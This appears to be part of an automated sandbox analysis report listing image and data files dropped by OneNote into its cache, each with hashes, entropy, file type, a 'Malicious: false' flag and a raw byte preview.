SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.254894425226721
Encrypted:	false
SSDEEP:	96:SsgLOidl5sVrM+WEc0qLXquB9nHXtVnqJdgR0TqPr3Oxxt7P:SsgLOidlyrxc9XquB9HXwgR0U3Oxxt7
MD5:	28B16AF484EFD103E0CC1790AB569332
SHA1:	B3B2366EF6482EDD3A96F02A067BBEA94AF7F555
SHA-256:	8EE60D5CB35853AE4DE2E694DB8C4AD02E8D3644BB9C45D9803DCC2876422DA8
SHA-512:	FC4454974110B6B9ECF5BF4C5C3A2B513D043B87D44E409F61534AFB8386ABC01097073438E27352CA518B16F0A4B6D81DC74CF8A10D7EC91CADD64B38C451A7
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ.A......A"......<..),.A"......<..),.A..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................^.w...lw=..4.....N...^...............(...%.E.#<.%.D.........&...................................>....I.qk..B.....LZ...............^.w...lw=..4............^.w...lw=..4...........A......A......A..........................................Aj.....AT.a...A......A..D...AH.....A..N...A..?.#.A..9...................;........4...4...4.."...............A..A..A..z...y.. x.. ...........$........4.....7..7...........Op.b..F.$..i.................;........4...4...4..........A......A....#.*A............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000070.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000072.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.326477479467443
Encrypted:	false
SSDEEP:	48:YuOsS7YRWxvBt7O1Eya7PXW67h9P46jddrd3rPhxNuKRX5Ddn5R:Yhs/0xvBsEyaTXWkh9PDPRbPcKH
MD5:	1320CCF509CA2642ECCCC61559C5CE99
SHA1:	A71FABBAEAEC0375022C3483FBF5B1A284629CEE
SHA-256:	1AA0D20221DD41FA3A8891BE226D97CF7E11C9BA9CAC51A7013E7220D80EC0AA
SHA-512:	A4929270129FEE9C240C91D31515549760C2E9C5F4D6FA8659279B3D2EEDA80D215FBC033805FCDDD2796B6203101E11FE65470EECD2D7E109845DA526FDAAF6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.>s......>s.f.{.........>s.f.{.........>s..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............X.m.&I...[........N...^...............)f)D(_yE..z.W.. ........f........................................I.qk..B.....LZ.............X.m.&I...[.............X.m.&I...[..............>s......>s......>s..........................................>sj.....>sT.]...>s......>s..B...>sH.....>s..B...>s..>.).>s..J...................;........4...4...4.."...............>s..>s..>s..z...y.. x.. ...........$........4.....7..7........................;........4...4...4..........>s......>s....#.>s............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.397320180908868
Encrypted:	false
SSDEEP:	48:zW2K+xfsjx88WI0a/tmqBEr+vwiX9i98Qj4V7rd3rQxTn0dXcrY26Oh:0+xfsa8Wja/lEMlXQ98Qy7Rbk06kG
MD5:	8F10CCADBA55EC0B78254D2BA0F8179A
SHA1:	991337009E195AF177BFCCA3CECE2B55CFD3D036
SHA-256:	1017FC1F876B0714DC5632CB3999A6B2C5AEDB897AB02C4E31EBDA8D26F0F122
SHA-512:	803DD7768C96FAD6449601E6504A22FFFD713ECB19C18E34BC2BA220BD6A4AC123427C2EF877B698FD1AE50C145D59372BCD44E858E641BEC8EF41DB164CAFCB
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.........c..Z...N-h(....c..Z...N-h(......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................:g..;o=)......N...^..................r..N.tC=&J..........f........................................I.qk..B.....LZ................:g..;o=)..............:g..;o=)......................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318159356013569
Encrypted:	false
SSDEEP:	48:Yu6BsfufnyOdL1ytFkdPEHGKsX5+90OAj4hrd3rUQxLFdXL5ygROhWZn1jesB:YlsQ1yYEmrXs90OAERb9D
MD5:	082542947DBD1EF0EBC2C77E2DC32C86
SHA1:	E803AA3C159AF2F1B711D27F41AE0855E2C11D60
SHA-256:	BC66542863A45F556E8BAC518683EF0B39F8930BFFBEAFB0F33F1DC431DC37F5
SHA-512:	15C74BC39A5F1206FE4F6A03FE16C2728193B08901F01091DF2AA730AEC1CFAA588EB44485267E556E5DB7659EB54B6CA43F7CCB8462717807F4F9477AC70E4B
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.#S......#S...$...Ss....#S...$...Ss....#S..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............U..!....+-8.)T....N...^...............J.q\|.!.I.V.-...?........f........................................I.qk..B.....LZ..............U..!....+-8.)T..........U..!....+-8.)T..........#S......#S......#S..........................................#Sj.....#ST.]...#S......#S..B...#SH.....#S..B...#S..>.).#S..J...................;........4...4...4.."...............#S..#S..#S..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........#S......#S....#.#S............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.330092062035197
Encrypted:	false
SSDEEP:	96:2sRQ1EAeE8FXpacP9UIpXClRbzngcdD4x:2sRQiAr8FXMw9UIpXsRbkOD4
MD5:	A072FEB204BE13426D48DFDA2431D3E3
SHA1:	3460DF3841F11CB0C2C16D00E7773410F7861277
SHA-256:	270668B2205DF5D35265B7FD46DD5999C499D13E228A91C2C68155603D19167B
SHA-512:	679940BA427D0680B6EF56FD52F74BFA28D4FE830FDF0800FED9BF8EA870DEE733E3513DFE72B9ADA308450D7C7CAE2D6EA49B322DB2725963B942BBA4E3C6D2
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........x>(......!.Zo...x>(......!.Zo.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............X K.>o.....f......N...^................(Vb.u.I....ZXVA........f........................................I.qk..B.....LZ.............X K.>o.....f...........X K.>o.....f..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.477824828909453
Encrypted:	false
SSDEEP:	48:IsUi3lfHoniXvtSEEbz1cXic9gkj4VrdMrvSdXEzk9kgHyA58U5Q5JkogDw:IsiniXvVEyXP9gkARM6w
MD5:	89578FE8DECCDD745C0DD464AD8AA24A
SHA1:	C25795E6DF4F3BD135C2B1CEDA7685A2CEA14E27
SHA-256:	9DAC548A7734C0C6F048884453C84ED9C6B7E6714B5121B376BF15FFF1F49399
SHA-512:	DD72ACF8EFBE9A84AC0B8DD67184A74062E97DC1A68BCBDE817BAEAEE55E248AF8759D9B29BA58CF2FCFAF6BEDCF785C538EFE06E4E431A67C5ABC2F798A4922
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ..U.......U..#]..z...<...U..#]..z...<...U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\|^r...={gb........N...^................~...n_L.=}..c`.........f........................................I.qk..B.....LZ.............\|^r...={gb.............\|^*r...={gb...............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
